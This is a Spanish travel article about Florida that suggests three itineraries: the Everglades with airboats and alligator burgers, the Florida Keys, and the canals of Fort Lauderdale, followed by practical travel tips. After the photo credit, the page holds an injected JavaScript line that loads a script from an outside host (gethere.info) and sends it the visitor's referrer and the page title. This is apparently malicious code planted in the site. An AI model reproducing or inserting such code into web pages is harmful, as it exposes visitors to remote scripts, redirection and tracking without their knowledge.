Hamburguesa de cocodrilo con ‘spanglish’

12/09/2012

Viva la mezcla de Miami. No se puede reprimir la sonrisilla cuando uno escucha frases como “wait for me in the esquina”. Pero más allá de la capital del spanglish se presenta ante nosotros un estado, el de Florida, donde lo natural marca los pasos del viajero. No todo va a ser rascacielos. Aquí proponemos tres itinerarios para que se reconcilie con la madre Tierra en esta península que mira hacia Latinoamérica.

Hamburguesa de cocodrilo. Al sur de la autopista 41, surge un inmenso parque natural protegido por la Unesco. Se trata de Everglades, una extensión de 6.000 kilómetros cuadrados de ciénagas y manglares (ojo con los mosquitos, que más que pequeños insectos parecen hidroaviones en busca de nuestra sangre). El agua está por todas partes, pero es una capa tan fina que solo se puede recorrer en aerodeslizador, una especie de lancha que incorpora un ventilador. Allí montado, mientras juncos y matorrales le saludan, le abrirán la boca los habitantes más famosos, cocodrilos y caimanes, cuya carne en forma de hamburguesa podrá probar en el restaurante.

Mar, mar y mar. Los Cayos de Florida o Florida Keys es un lugar abierto a la inmensidad del agua con 1700 islas. En realidad es una barrera natural entre el Oceáno Atlántico y el Golfo de México. Uno puede bucear y contemplar los maravillosos fondos submarinos (en el John Pennekamp Coral Reef State Park de Key Largo, la isla más cercana a Miami, y en Big Pine Key), nadar con delfines (en el Dolphin Research Center de Marathon), tumbarse en una playa (Anne’s Beach, por ejemplo, en Key Large) y aplaudir al ocaso en Key West, un lugar bohemio y bullicioso donde se encuentra la casa-museo del escritor Ernest Hemingway.

La llaman la Venecia de Estados Unidos. Fort Lauderdale es un lugar casi irreal repleto de canales. Un buen plan es coger un water taxi y surcar las aguas para maravillarse con las lujosas mansiones y los yates que compiten en espectacularidad. Las cafeterías dan ambiente a este rincón del exceso, pero también hay espacio para la cultura en el Museo de Arte, que expone obras de artistas como Picasso, Miró o Matisse. El día se ha de terminar en uno de sus muchos spas. En cuanto menos se lo espere, su mente estará volando libre.

Datos útiles:

  • A Florida se le conoce como el estado soleado. Tiene más de 18 millones de habitantes. Sus ciudades más importantes son Miami, Jacksonville, Orlando, Tampa y Talahassee (su capital). Su parte más al sur sólo dista unos 150 kilómetros de Cuba.
  • Como siempre cuando se viaja a Estados Unidos, previamente hay que rellenar un cuestionario vía online para acceder sin problemas como turista al país: https://esta.cbp.dhs.gov.
  • Las propinas son voluntarias, pero es costumbre dejar entre un 15 y un 20% de la consumición.
  • La moneda es el dólar.
  • Iberia ofrece vuelos directos a Miami desde Madrid. Los mejores precios siempre a través de www.iberia.com.

Foto | Captain Kimo

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO